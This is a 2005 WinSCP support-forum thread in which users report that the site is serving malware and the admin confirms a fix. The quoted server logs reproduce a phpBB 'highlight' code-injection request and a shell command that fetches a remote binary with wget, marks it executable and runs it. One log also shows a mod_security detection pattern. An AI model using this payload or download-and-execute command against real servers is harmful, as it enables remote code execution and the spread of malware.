Topic "THIS SITE IS HACKED!!"

Author Message
DogForum

Guest


Does anyone of the admin folks here know that this server has been hacked it's currently delivering the malware for further attacks on thousands of other systems?

Here a HTTP header i've got a number of days today:

Quote:
========================================
Request: 216.240.142.215 - - [[22/Jul/2005:00:13:53 +0200]] "GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 500 628
Handler: (null)
----------------------------------------
GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Host: [snip for security reasons]
Accept: */*
User-Agent: Mozilla/4.0
PHP: cd /tmp;wget http: / / winscp.net/forum/db/session;chmod +x session;./session;rm -f session


Please shut this server down as quickly as possible and privide for *ALL* the necessary cleanup and software updates necessary to avoid this situation!!

For further info contact me at:
fsaom at spmtst.homeip.net

Kind regards

Manf
Advertisements
Guest




Got attacked by this site also:

Quote:
HTTP/1.1 403 Forbidden
Content-Length: 309
Keep-Alive: timeout=15, max=293
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
========================================
UNIQUE_ID: tvY7Tdh-VEwAAC9oCjQAAAAE
Request: 217.22.54.52 - - [21/Jul/2005:21:20:51 --0500] "GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(get
env(HTTP_PHP)).' HTTP/1.0" 403 293
Handler: (null)
----------------------------------------
GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Host: www.MYSITE.com
Accept: */*
User-Agent: Mozilla/4.0
PHP: cd /tmp;wget http://winscp.net/forum/db/session;chmod +x session;./session;rm -f session
mod_security-message: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite|wget)" at THE_REQUEST
mod_security-action: 403[
martin
[View user's profile]
Site Admin
Joined: 2002-12-10
Posts: 24530
Location: Prague, Czechia
Issue is hopefully solved. I apologise for any trouble it caused you and my negligence.
_________________
Martin Prikryl
martin
[View user's profile]
Site Admin
Joined: 2002-12-10
Posts: 24530
Location: Prague, Czechia
Also please note that the attacks seem to continue from other affected servers. The attacks attempt to use our server to donwload the files. However the files are no longer present on our server.

Note that both IP addresess listed above are not of our server!
_________________
Martin Prikryl
Advertisements

You can post new topics in this forum






Search Site

What is WinSCP?

It is award-winning SFTP client, SCP client, FTPS client and FTP client integrated into one software program for file transfer to FTP server or secure SFTP server. [More]

And it's free!

Donate

About donations

$9   $19   $49   $99

About donations

Recommend

WinSCP Privacy Policy

WinSCP License